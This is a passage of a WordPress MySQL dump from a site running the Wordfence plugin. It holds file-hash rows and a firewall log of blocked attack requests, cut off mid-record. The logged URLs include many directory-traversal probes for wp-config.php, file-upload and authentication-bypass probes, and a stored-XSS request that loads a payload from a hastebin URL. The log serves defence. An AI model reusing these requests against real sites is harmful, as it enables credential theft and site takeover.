��^�,','',0,'?'),('��9�R�͛�6@3L','wp-content/uploads/2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME-300x200.jpg',0,'�/C�M17�^su^�\\\r�','�/C�M17�^su^�\\\r�','a��^}�\\yGp2�rel��b��t�s�ڼnl�','',0,'?'),('��x�R���+@:D���','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ms.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�,�QΗ_�����e','�h���`��t�(�XJ��o;]�-�6�v','',0,'?'),('����N��9�{�;','wp-includes/js/mediaelement/wp-mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',m;V*H��Tt���~X�','��a�ԋRY哝���a����<�n[G{=y3�? ','',0,'?'),('��.���I�\nfq�M9','wp-includes/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�i��L�V=X+� v0~','4��-<4�,\"V�ȱXʘî�hR� K�F�k�','',0,'?'),('��_���\r���[�}�O','wp-content/languages/en_GB-7289286ed59e90a8f36ae797df62220b.json',0,'�nE�I%P��F�RA','�nE�I%P��F�RA','����f8?B�ͧ�L�g�A|� #U�=�R�$<','',0,'?'),('�\"U�F~B�.��S','wp-includes/blocks/video/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gv���B��pH��=�','��,��TD]��� �����BM���6ꗎ�5Q�','',0,'?'),('�5|��Nɽ~*%�>Ht','wp-content/plugins/wordpress-seo/languages/wordpress-seo-es_MX.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�4�w=� ��xc%',']ň���A�M]��gn���[�uL!�a�*�,��','',0,'?'),('�;`�$r���$���=','wp-content/plugins/wordfence/images/icons/warning128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�G�I�t*����Np=','����*�/���Ⱦs��t�A����}.b\'\\','',0,'?'),('�>675�Mwԑ*x���','wp-content/plugins/wordpress-seo/languages/wordpress-seo-en_NZ.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��>�ij�M�-<','\0�Ioӥ!�31��{T��Q���\">�E��W/','',0,'?'),('�B�}3��)�A��','wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-structure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+y,���^jW�ǡt','��&�BmRCv����\\��BT&՚�Gq���','',0,'?'),('�E58��y���Ws�O��','wp-admin/css/admin-menu.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�lI2����f���^P','�g\0N�]��Jw�\0��S�2�)(�U�E���z�W�','',0,'?'),('�L����e5x?e=�&','wp-includes/js/plupload/wp-plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���nXǑ��i)','�>�#�ci�5��ct6�\"����w�)�','',0,'?'),('�QS�2�#��]�srt�','wp-includes/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>����ͯ\ZHdy��4','-�ڣ���|A\rc���w��H4�Up����c�','',0,'?'),('�k����PP��1<�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ou�l��_�4@��','6b% �\"�ʴs�J�p3����8ӷ�SǙ:����','',0,'?'),('��HF)\\�,�b�','wp-includes/js/jquery/ui/controlgroup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�mU��K\ZNP�*{�','(�\Z�V]MgZ�\ZR�ˆF�̄{��(���Y2]','',0,'?'),('��~%B�\0�z���?o','wp-includes/IXR/class-IXR-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�/�z�*�zͷ�;','lG\'��r5���+�̔Mh�Shq>�� \0Ϧ','',0,'?'),('���p��KS_e�eJq9','wp-content/themes/twentytwentyone/assets/images/self-portrait-1885.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�Y�gs|��BMj','���������%*�kb$�ZR��f�i�`�','',0,'?'),('��a5[4�5�Me�pC','wp-includes/js/jquery/ui/effect-bounce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�&�@��ڧrZ','�%MdžP��˧��3d(q��r�)i�x�>�','',0,'?'),('��S�CRC��l��','wp-admin/css/colors/sunrise/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��\Z�z� h��=�','��Q_n��97�L2��$��y:j�Sх����','',0,'?'),('���߹u7���[)�h','wp-includes/blocks/embed/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�x�x�-�2ggo','Շ��u�)��q\"��S\'�s�`֪9��~d`�','',0,'?'),('���k��i��.���\\��','wp-includes/images/smilies/icon_neutral.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��VM3HU1!�v','���Ois8\0�|z��6�]e��@Y�m49','',0,'?'),('��4�5��q-��p,��','wp-includes/blocks/file/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6,�@A��cɃ��','*�\"U �6O~4��~l����h�=�Wְ}!I�','',0,'?'),('���Rl�?&���J�','wp-content/uploads/2018/05/builder-768x511.jpg',0,'q.)8�T[�N⁁','q.)8�T[�N⁁','=��\n/�5��4<h������*u��aR���','',0,'?'),('��©6��<��\09ZiR','wp-includes/js/jquery/ui/effect-fade.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rs�J��7O,��','O#W�V�}��+<������Ϭ>!�����','',0,'?'),('���@~}c���Q�\'��J','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�9��;%��mM6Z','6�-�2�Xjݒ[�l��ÆL \'8FJ','',0,'?'),('�� �����<Zu','wp-content/uploads/2019/12/pexels-photo-164005-300x250.jpeg',0,'-w��R��\\���.S�','-w��R��\\���.S�','�lxy�:|&��0:���(CIm]U��gn�fo','',0,'?'),('���Y�a�@;��ioʻ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�W��:�.p�j[yyQ','v�6$�-���ȓ��k�Z��Op��]�\"�r5','',0,'?');
/*!40000 ALTER TABLE `wp_wffilemods` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfhits`
--
DROP TABLE IF EXISTS `wp_wfhits`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhits` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`attackLogTime` double(17,6) unsigned NOT NULL,
`ctime` double(17,6) unsigned NOT NULL,
`IP` binary(16) DEFAULT NULL,
`jsRun` tinyint(4) DEFAULT 0,
`statusCode` int(11) NOT NULL DEFAULT 200,
`isGoogle` tinyint(4) NOT NULL,
`userID` int(10) unsigned NOT NULL,
`newVisit` tinyint(3) unsigned NOT NULL,
`URL` text DEFAULT NULL,
`referer` text DEFAULT NULL,
`UA` text DEFAULT NULL,
`action` varchar(64) NOT NULL DEFAULT '',
`actionDescription` text DEFAULT NULL,
`actionData` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `k1` (`ctime`),
KEY `k2` (`IP`,`ctime`),
KEY `attackLogTime` (`attackLogTime`)
) ENGINE=InnoDB AUTO_INCREMENT=2411 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfhits`
--
LOCK TABLES `wp_wfhits` WRITE;
/*!40000 ALTER TABLE `wp_wfhits` DISABLE KEYS */;
INSERT INTO `wp_wfhits` VALUES (2273,0.000000,1629064474.704114,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://housing-today.co.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(2274,1629290437.558467,1629290437.474900,'\0\0\0\0\0\0\0\0\0\0��%�ƴ',0,403,0,0,0,'https://housing-today.co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2275,1629290437.231087,1629290437.139200,'\0\0\0\0\0\0\0\0\0\0��%�ƴ',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thamF4X3BhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlLWVkaXRvci9lZGl0b3IvZXh0ZW5zaW9ucy9wYWdlYnVpbGRlci9pbmNsdWRlcy9hamF4X3Nob3J0Y29kZV9wYXR0ZXJuLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2276,1629314046.452162,1629314046.354300,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2277,1629456851.953354,1629456851.580800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(2278,1629457009.520935,1629457009.085700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://housing-today.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(2279,1629457111.077202,1629457110.931300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'python-requests/2.26.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2280,1629457134.720271,1629457134.533000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'python-requests/2.26.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2281,0.000000,1629463909.996432,'\0\0\0\0\0\0\0\0\0\0����qH',0,302,0,1,0,'https://housing-today.co.uk/wp-login.php','https://housing-today.co.uk/wp-login.php?redirect_to=https%3A%2F%2Fhousing-today.co.uk%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36','loginOK',NULL,NULL),(2282,1629465516.483902,1629465516.396200,'\0\0\0\0\0\0\0\0\0\0��{9�',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','WAF-RULE-328','{\"learningMode\":0,\"failedRules\":\"328\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"Ly9ob21lL2hvdXNpbmctdG9kYXkuY28udWsvcHVibGljX2h0bWwvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"bypass\",\"ssl\":1}'),(2283,1629465552.438503,1629465552.321000,'\0\0\0\0\0\0\0\0\0\0��{9�',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','blocked:waf','Modern WPBakery Page Builder Addons <= 3.0.1 Unprotected AJAX Actions','{\"learningMode\":0,\"failedRules\":\"362\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"Ly9ob21lL2hvdXNpbmctdG9kYXkuY28udWsvcHVibGljX2h0bWwvd3AtYWRtaW4vYWRtaW4tYWpheC5waHA=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"bypass\",\"ssl\":1}'),(2284,1629499389.765020,1629499389.655100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(2285,1629499401.496168,1629499401.241100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(2286,1629499426.101346,1629499425.970900,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGJpZF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWMtZG9jay1nYWxsZXJ5L21hY2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2287,1629499425.589316,1629499425.194800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi1iYWNrdXAvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2288,1629499424.686838,1629499424.556500,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtZG9jLWV4cG9ydGVyL2FzcG9zZV9kb2NfZXhwb3J0ZXJfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2289,1629499424.210866,1629499424.108400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2290,1629499423.294397,1629499423.170100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2291,1629499421.327542,1629499421.205700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2292,1629499420.728985,1629499420.604700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL05hdGl2ZUNodXJjaC9kb3dubG9hZC9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2293,1629499419.849611,1629499419.743600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NodXJjaG9wZS9saWIvZG93bmxvYWRsaW5rLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2294,1629499419.250375,1629499419.127500,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmbl0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90ZXJhLWNoYXJ0cy9jaGFydHMvdHJlZW1hcC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2295,1629499418.738008,1629499418.400800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tsaWJwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zbmlwbGV0cy9tb2R1bGVzL3N5bnRheF9oaWdobGlnaHQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2296,1629499417.900848,1629499417.610400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtaW1hZ2UtbWFuaXB1bGF0b3IvY29udHJvbGxlci9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2297,1629499417.308806,1629499417.197200,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2298,1629499416.396274,1629499416.206800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tteVBhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9teWdhbGxlcnkvbXlmdW5jdGlvbnMvbXlnYWxsZXJ5YnJvd3Nlci5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2299,1629499415.673992,1629499415.536400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9taW5pLW1haWwtZGFzaGJvYXJkLXdpZGdldHdwLW1pbmktbWFpbC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(2300,1629499415.079901,1629499414.967700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - 